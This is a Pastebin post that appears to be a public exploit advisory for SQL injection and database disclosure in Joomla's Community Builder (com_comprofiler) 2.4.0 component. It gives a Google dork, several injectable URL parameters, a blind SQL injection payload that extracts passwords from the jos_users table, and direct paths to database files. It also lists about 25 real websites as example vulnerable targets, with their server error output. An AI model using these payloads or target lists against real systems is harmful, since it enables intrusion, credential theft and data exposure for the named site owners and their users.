Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- ####################################################################
- # Exploit Title : Joomla ComProfiler Community Builder Components 2.4.0 SQL Injection / Database Disclosure
- # Author [ Discovered By ] : KingSkrupellos
- # Team : Cyberizm Digital Security Army
- # Date : 03/02/2019
- # Vendor Homepage : joomlapolis.com
- # Software Download Link : joomlapolis.com/downloads
- # Software Information Link : extensions.joomla.org/extension/community-builder/
- # Software Version : 2.4.0
- # Tested On : Windows and Linux
- # Category : WebApps
- # Exploit Risk : Medium
- # Google Dorks : inurl:''/index.php?option=com_comprofiler''
- # Vulnerability Type : CWE-89 [ Improper Neutralization of
- Special Elements used in an SQL Command ('SQL Injection') ]
- CWE-200 [ Information Exposure ]
- # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
- # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
- # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
- ####################################################################
- # Description about Software :
- ***************************
- Community Builder ComProfiler is an extremely flexible and robust social networking solution for Joomla.
- ####################################################################
- # Impact :
- ***********
- * Joomla ComProfiler Community Builder 2.4.0 component for Joomla is prone to an
- SQL-injection vulnerability because it fails to sufficiently sanitize
- user-supplied data before using it in an SQL query.
- Exploiting this issue could allow an attacker to compromise the application,
- access or modify data, or exploit latent vulnerabilities in the underlying database.
- A remote attacker can send a specially crafted request to the vulnerable application
- and execute arbitrary SQL commands in application`s database.
- Further exploitation of this vulnerability may result in unauthorized data manipulation.
- An attacker can exploit this issue using a browser.
- * This Software prone to an information exposure/database disclosure vulnerability.
- Successful exploits of this issue may allow an attacker to obtain sensitive
- information by downloading the full contents of the application's database.
- * Any remote user may download the database files and gain access
- to sensitive information including unencrypted authentication credentials.
- ####################################################################
- # SQL Injection Exploit :
- **********************
- /index.php?option=com_comprofiler&task=[SQL Injection]
- /index.php?option=com_comprofiler&task=usersList&Itemid=[SQL Injection]
- /index.php?option=com_comprofiler&task=userProfile&user=[SQL Injection]
- /index.php?option=com_comprofiler&view=login&Itemid=[SQL Injection]
- /index.php?option=com_comprofiler&task=userProfile&user=[ID-NUMBER]&Itemid=[SQL Injection]
- /index.php?option=com_comprofiler&task=usersList&listid=[ID-NUMBER]&Itemid=[ID-NUMBER]&limitstart=[SQL Injection]
- /index.php?option=com_comprofiler&task=pluginclass&plugin=cb.facebookconnect&action=facebookconnect&func=session&Itemid=&format=[SQL Injection]
- /index.php?option=com_comprofiler&task=fieldclass&function=checkvalue&user=[ID-NUMBER]&reason=register&format=raw&field=[SQL Injection]
- # Example Exploit Payload :
- ************************
- /index.php?option=com_comprofiler&task=userProfile&user=1/**/and/**/mid
- ((select/**/password/**/from/**/jos_users/**/limit/**/0,1),1,1)/**/</**/Char(97)/*
- # Database Disclosure Exploit :
- **************************
- /administrator/components/com_comprofiler/install.comprofiler.sql
- /administrator/components/com_comprofiler/database/database.cbcore.xml
- ####################################################################
- # Example Vulnerable Sites :
- *************************
- [+] demaitere.fr/joomla1.6.1/administrator/components
- /com_comprofiler/install.comprofiler.sql
- [+] medicine-bg.net/index.php?option=com_comprofiler&task=1%27
- [+] ia.pw.edu.pl/~openm3/index.php?option=
- com_comprofiler&task=usersList&Itemid=41%27
- [+] africaplaces.com/index.php?option=com_comprofiler&task=1%27
- [+] press.100promotion.net/index.php?option=com_comprofiler&task=1%27
- [+] cobur.nl/vp/nl/index.php?option=
- com_comprofiler&task=userProfile&user=4131%27
- [+] lastanza.tempodelsogno.com/joomla/index.php?option=
- com_comprofiler&task=1%27
- [+] estudiocadoche.com/index.php?option=com_comprofiler&task=
- userslist&Itemid=81%27
- [+] peisagistica.usamv.ro/index.php?option=com_comprofiler&task=
- userProfile&user=111&Itemid=156%27
- [+] educaciononline.edu.ec/index.php?option=com_comprofiler&task=
- pluginclass&plugin=cb.facebookconnect&action=facebookconnect
- &func=session&Itemid=&format=1%27
- [+] delftgenclik.nl/nl/index.php?option=com_comprofiler&task=
- usersList&listid=4&Itemid=59&limitstart=340%27
- [+] unreal.moonliteshadow.org/index.php?option=com_comprofiler&task=1%27
- [+] beliebtsein.de/index.php?option=com_comprofiler&Itemid=73%27
- [+] islah-net.net/index.php?option=com_comprofiler&task=1%27
- [+] weblearningtools.org/wltres-j15/index.php?option=
- com_comprofiler&task=fieldclass&function=
- checkvalue&user=0&reason=register&format=raw&field=1%27
- [+] new.ecla-handball.org/index.php?option=com_comprofiler&task=1%27
- [+] qualityoflifelearning.com/index.php?option=com_comprofiler&task=%27
- [+] missaocristabr.org/index.php?option=com_comprofiler&task=1%27
- [+] wlcklub.hu/index.php?option=com_comprofiler&task=1%27
- [+] eventvermittlung.at/index.php?option=com_comprofiler&task=1%27
- [+] davidpeake.com/index.php?option=com_comprofiler&task=1%27
- [+] vlcom.dk/index.php?option=com_comprofiler&task=1%27
- [+] abi99gymbo.de/index.php?option=com_comprofiler&task=1%27
- [+] riogrande4x4.com.br/index.php?option=com_comprofiler
- &task=userProfile&user=63&Itemid=71%27
- ####################################################################
- # Example SQL Database Error :
- ****************************
- Deprecated: Assigning the return value of new by reference is
- deprecated in /home/openm3/.homepage/includes/joomla.php on line 844
- Warning: Cannot modify header information - headers already
- sent by (output started at /home/openm3/.homepage
- /includes/joomla.php:844) in /home/openm3/.homepage
- /includes/joomla.php on line 697
- Warning: call_user_func_array() expects parameter 2
- to be array, string given in /home2/francis6/public_html/vw
- /administrator/components/com_comprofiler
- /plugin.foundation.php on line 1484
- Strict Standards: Non-static method JLoader::import() should
- not be called statically in /home/100promotion.net
- /press.100promotion.net/libraries/joomla/import.php on line 29
- Fatal error: Uncaught Error: Call to undefined function
- set_magic_quotes_runtime() in /customers/8/e/1/vlcom.dk
- /httpd.www/includes/framework.php:21 Stack trace: #0 /customers
- /8/e/1/vlcom.dk/httpd.www/index.php(22): require_once() #1
- {main} thrown in /customers/8/e/1/vlcom.dk
- /httpd.www/includes/framework.php on line 21
- ####################################################################
- # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
- ####################################################################
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement